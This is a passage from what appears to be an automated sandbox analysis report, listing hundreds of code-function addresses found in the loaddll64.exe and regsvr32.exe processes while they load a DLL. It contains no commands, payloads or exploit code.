                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018B100_2_0000000180018B10
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001CB180_2_000000018001CB18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180016B8C0_2_0000000180016B8C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004EBA00_2_000000018004EBA0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018C540_2_0000000180018C54
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002CCCC0_2_000000018002CCCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180016CE80_2_0000000180016CE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001CD000_2_000000018001CD00
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001ED300_2_000000018001ED30
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018D980_2_0000000180018D98
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180016DF00_2_0000000180016DF0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004CEC80_2_000000018004CEC8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018EC80_2_0000000180018EC8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180016EF80_2_0000000180016EF8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001EF180_2_000000018001EF18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001CF2C0_2_000000018001CF2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180042F880_2_0000000180042F88
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180018FD00_2_0000000180018FD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800170000_2_0000000180017000
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800190D80_2_00000001800190D8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F1040_2_000000018001F104
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001D1140_2_000000018001D114
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800171580_2_0000000180017158
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002D19C0_2_000000018002D19C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800191E00_2_00000001800191E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800172600_2_0000000180017260
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001D2FC0_2_000000018001D2FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004F2FC0_2_000000018004F2FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B3100_2_000000018001B310
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F3340_2_000000018001F334
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800193380_2_0000000180019338
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800173680_2_0000000180017368
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800194400_2_0000000180019440
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800174740_2_0000000180017474
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002B49C0_2_000000018002B49C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B4F80_2_000000018001B4F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F5200_2_000000018001F520
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001D5280_2_000000018001D528
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800195480_2_0000000180019548
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800175D00_2_00000001800175D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800196500_2_0000000180019650
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002D6800_2_000000018002D680
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800176D40_2_00000001800176D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F70C0_2_000000018001F70C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001D7100_2_000000018001D710
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B7240_2_000000018001B724
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004972C0_2_000000018004972C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800257400_2_0000000180025740
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800197B80_2_00000001800197B8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004B7E80_2_000000018004B7E8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800178000_2_0000000180017800
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800198C00_2_00000001800198C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002B8D00_2_000000018002B8D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001D8FC0_2_000000018001D8FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800179080_2_0000000180017908
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001B90C0_2_000000018001B90C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001F93C0_2_000000018001F93C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800199C80_2_00000001800199C8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017A100_2_0000000180017A10
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018003FA6C0_2_000000018003FA6C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180045A700_2_0000000180045A70
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180019AD00_2_0000000180019AD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180025AD40_2_0000000180025AD4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001BAF40_2_000000018001BAF4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017B180_2_0000000180017B18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001DB2C0_2_000000018001DB2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002DB500_2_000000018002DB50
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180019C280_2_0000000180019C28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017C700_2_0000000180017C70
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018003BD000_2_000000018003BD00
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001DD180_2_000000018001DD18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002BD1C0_2_000000018002BD1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001BD200_2_000000018001BD20
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180019D300_2_0000000180019D30
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017D780_2_0000000180017D78
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180045A700_2_0000000180045A70
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180019E380_2_0000000180019E38
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017E800_2_0000000180017E80
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180049EEC0_2_0000000180049EEC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180025EFC0_2_0000000180025EFC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001DF040_2_000000018001DF04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001BF080_2_000000018001BF08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018003FF1C0_2_000000018003FF1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180019F400_2_0000000180019F40
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180017F880_2_0000000180017F88
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002DFAC0_2_000000018002DFAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000019428C200000_2_0000019428C20000
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68EB080_2_000001942A68EB08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68A8040_2_000001942A68A804
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68BD640_2_000001942A68BD64
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A697E280_2_000001942A697E28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A681B880_2_000001942A681B88
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A688B3C0_2_000001942A688B3C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A675B180_2_000001942A675B18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68FC700_2_000001942A68FC70
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67CCC80_2_000001942A67CCC8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69B6BC0_2_000001942A69B6BC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6874140_2_000001942A687414
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6869780_2_000001942A686978
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6989900_2_000001942A698990
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69796C0_2_000001942A69796C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69093C0_2_000001942A69093C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6749480_2_000001942A674948
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6949180_2_000001942A694918
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67D92C0_2_000001942A67D92C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6899F40_2_000001942A6899F4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68C9F00_2_000001942A68C9F0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6829BC0_2_000001942A6829BC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68D9C40_2_000001942A68D9C4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A699A400_2_000001942A699A40
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A692AFC0_2_000001942A692AFC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A691AE00_2_000001942A691AE0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A672AE40_2_000001942A672AE4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67FAD00_2_000001942A67FAD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A690AC40_2_000001942A690AC4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A673A9C0_2_000001942A673A9C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68F7640_2_000001942A68F764
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6897200_2_000001942A689720
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68C7200_2_000001942A68C720
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6837240_2_000001942A683724
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6907D00_2_000001942A6907D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6827A40_2_000001942A6827A4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68E7A40_2_000001942A68E7A4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68484C0_2_000001942A68484C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6748480_2_000001942A674848
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67F8500_2_000001942A67F850
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6728200_2_000001942A672820
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68C8C00_2_000001942A68C8C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6878C40_2_000001942A6878C4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6938940_2_000001942A693894
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67ED840_2_000001942A67ED84
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A689D5C0_2_000001942A689D5C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A683D1C0_2_000001942A683D1C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69BD200_2_000001942A69BD20
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A691D2C0_2_000001942A691D2C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67BD240_2_000001942A67BD24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A692E040_2_000001942A692E04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A693DD40_2_000001942A693DD4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A690DBC0_2_000001942A690DBC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A672DC00_2_000001942A672DC0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A687DB00_2_000001942A687DB0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A699DA80_2_000001942A699DA8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69BE900_2_000001942A69BE90
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68EE5C0_2_000001942A68EE5C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67FE580_2_000001942A67FE58
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A683E180_2_000001942A683E18
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A695E300_2_000001942A695E30
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A694EF40_2_000001942A694EF4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A698EE80_2_000001942A698EE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A689EC00_2_000001942A689EC0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67DB740_2_000001942A67DB74
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A680B600_2_000001942A680B60
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67CB6C0_2_000001942A67CB6C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A696B400_2_000001942A696B40
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A687B240_2_000001942A687B24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A698B280_2_000001942A698B28
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67BC080_2_000001942A67BC08
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68ABD80_2_000001942A68ABD8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A677BB40_2_000001942A677BB4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A683BB40_2_000001942A683BB4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A674C640_2_000001942A674C64
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A680C680_2_000001942A680C68
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A690C680_2_000001942A690C68
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A685C500_2_000001942A685C50
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A692C480_2_000001942A692C48
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A687C300_2_000001942A687C30
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A678CE00_2_000001942A678CE0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68ACEC0_2_000001942A68ACEC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A673CE80_2_000001942A673CE8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A677CAC0_2_000001942A677CAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6871440_2_000001942A687144
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68A1300_2_000001942A68A130
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6832100_2_000001942A683210
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6731F00_2_000001942A6731F0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6751980_2_000001942A675198
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6741A80_2_000001942A6741A8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67B1A80_2_000001942A67B1A8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67F2900_2_000001942A67F290
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67E2540_2_000001942A67E254
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68D2540_2_000001942A68D254
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68F2380_2_000001942A68F238
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6912FC0_2_000001942A6912FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67D3000_2_000001942A67D300
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69A3040_2_000001942A69A304
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6933040_2_000001942A693304
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6772E00_2_000001942A6772E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67B2BC0_2_000001942A67B2BC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A678F5C0_2_000001942A678F5C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A692F3C0_2_000001942A692F3C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A696F3C0_2_000001942A696F3C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A673F400_2_000001942A673F40
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67AFE40_2_000001942A67AFE4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67DFCC0_2_000001942A67DFCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67EFCC0_2_000001942A67EFCC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A682F940_2_000001942A682F94
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68EFAC0_2_000001942A68EFAC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6740780_2_000001942A674078
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69A0880_2_000001942A69A088
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68406C0_2_000001942A68406C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6940200_2_000001942A694020
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6710140_2_000001942A671014
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68B0280_2_000001942A68B028
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67B0F80_2_000001942A67B0F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6861100_2_000001942A686110
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6790D40_2_000001942A6790D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69B0EC0_2_000001942A69B0EC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6730BC0_2_000001942A6730BC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67F5800_2_000001942A67F580
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6805780_2_000001942A680578
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69155C0_2_000001942A69155C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68B5580_2_000001942A68B558
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69B5700_2_000001942A69B570
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6965200_2_000001942A696520
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6836100_2_000001942A683610
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6725D80_2_000001942A6725D8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6845940_2_000001942A684594
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6865940_2_000001942A686594
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68C5AC0_2_000001942A68C5AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6806800_2_000001942A680680
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6926380_2_000001942A692638
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68F61C0_2_000001942A68F61C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68D6200_2_000001942A68D620
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68762C0_2_000001942A68762C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6727080_2_000001942A672708
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6736E00_2_000001942A6736E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6846B40_2_000001942A6846B4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69369C0_2_000001942A69369C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67B6980_2_000001942A67B698
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6766980_2_000001942A676698
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6976A40_2_000001942A6976A4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6916A80_2_000001942A6916A8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6713680_2_000001942A671368
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6843680_2_000001942A684368
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69632C0_2_000001942A69632C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6943300_2_000001942A694330
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6913FC0_2_000001942A6913FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68A4080_2_000001942A68A408
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6893E00_2_000001942A6893E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67B3E40_2_000001942A67B3E4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6793AC0_2_000001942A6793AC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6754840_2_000001942A675484
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A67C4580_2_000001942A67C458
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A69344C0_2_000001942A69344C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6864180_2_000001942A686418
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6984DC0_2_000001942A6984DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6824E40_2_000001942A6824E4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68D4D00_2_000001942A68D4D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A6814A00_2_000001942A6814A0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000001942A68E4A80_2_000001942A68E4A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A0982_2_000000018001A098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003E0D02_2_000000018003E0D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800180E02_2_00000001800180E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C0F42_2_000000018001C0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E1342_2_000000018001E134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C1502_2_000000018002C150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A1A02_2_000000018001A1A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004E1C02_2_000000018004E1C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181E42_2_00000001800181E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800262882_2_0000000180026288
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A2A82_2_000000018001A2A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800182E82_2_00000001800182E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3202_2_000000018001E320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C3242_2_000000018001C324
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800583382_2_0000000180058338
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A3B42_2_000000018001A3B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800063E02_2_00000001800063E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800183F02_2_00000001800183F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002E4202_2_000000018002E420
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E5082_2_000000018001E508
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C5102_2_000000018001C510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800285142_2_0000000180028514
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C51C2_2_000000018002C51C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185482_2_0000000180018548
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018005A5A42_2_000000018005A5A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800266182_2_0000000180026618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800186502_2_0000000180018650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800286682_2_0000000180028668
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004067C2_2_000000018004067C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004E6F02_2_000000018004E6F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C6FC2_2_000000018001C6FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E7342_2_000000018001E734
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800187582_2_0000000180018758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800287E42_2_00000001800287E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800188602_2_0000000180018860
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800168702_2_0000000180016870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800548F82_2_00000001800548F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9002_2_000000018002C900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E91C2_2_000000018001E91C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C92C2_2_000000018001C92C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800169782_2_0000000180016978
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800189CC2_2_00000001800189CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026A242_2_0000000180026A24
